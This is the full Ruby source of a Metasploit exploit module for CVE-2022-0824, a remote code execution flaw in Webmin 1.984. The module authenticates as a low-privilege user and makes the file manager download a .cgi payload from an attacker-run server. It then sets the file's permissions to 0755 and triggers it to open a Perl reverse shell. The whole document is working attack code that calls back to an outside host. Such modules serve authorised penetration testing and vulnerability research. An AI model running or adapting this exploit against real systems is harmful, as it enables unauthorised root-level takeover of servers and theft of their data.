Webmin 1.984 File Manager Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::Remote::HTTP::Webmin  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Webmin File Manager RCE',  
'Description' => %q{  
In Webmin version 1.984, any authenticated low privilege user without access rights to  
the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and  
changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those  
functionalities in the file manager.  
},  
'Author' => [  
'faisalfs10x', # discovery  
'jheysel-r7' # module  
],  
'References' => [  
[ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit  
[ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit  
[ 'CVE', '2022-0824']  
],  
'License' => MSF_LICENSE,  
'Platform' => 'linux',  
'Privileged' => true,  
'Targets' => [  
[  
'Automatic (Unix In-Memory)',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_memory,  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2022-02-26',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
OptPort.new('RPORT', [true, 'The default webmin port', 10000]),  
OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),  
OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])  
]  
)  
end  
  
def check  
webmin_check('0', '1.984')  
end  
  
def login  
webmin_login(datastore['USERNAME'], datastore['PASSWORD'])  
end  
  
def download_remote_url  
print_status('Fetching payload from HTTP server')  
  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),  
'method' => 'POST',  
'keep_cookies' => true,  
'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',  
'headers' => {  
'Accept' => 'application/json, text/javascript, */*; q=0.01',  
'Accept-Encoding' => 'gzip, deflate',  
'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',  
'X-Requested-With' => 'XMLHttpRequest',  
'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'  
},  
'vars_get' => {  
'module' => 'filemin'  
}  
})  
  
fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res  
fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')  
register_file_for_cleanup("/usr/share/webmin/#{@file_name}")  
end  
  
def modify_permissions  
print_status('Modifying the permissions of the uploaded payload to 0755')  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),  
'method' => 'POST',  
'keep_cookies' => true,  
'headers' => {  
'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'  
},  
'vars_get' => {  
'module' => 'filemin',  
'page' => '1',  
'paginate' => '30'  
},  
'vars_post' => {  
'name' => @file_name,  
'perms' => '0755',  
'applyto' => '1',  
'path' => '/usr/share/webmin'  
}  
})  
fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302  
end  
  
def exec_revshell  
res = send_request_cgi(  
'method' => 'GET',  
'keep_cookies' => true,  
'uri' => normalize_uri(datastore['TARGETURI'], @file_name),  
'headers' => {  
'Connection' => 'keep-alive'  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500  
end  
  
def on_request_uri(cli, request)  
print_status("Request '#{request.method} #{request.uri}'")  
print_status('Sending payload ...')  
send_response(cli, payload.encoded,  
'Content-Type' => 'application/octet-stream')  
end  
  
def exploit  
start_service  
@file_name = (get_resource.gsub('/', '') + '.cgi')  
cookie = login  
fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?  
print_status('Downloading remote url')  
download_remote_url  
print_status('Finished downloading remote url')  
modify_permissions  
exec_revshell  
end  
end  
`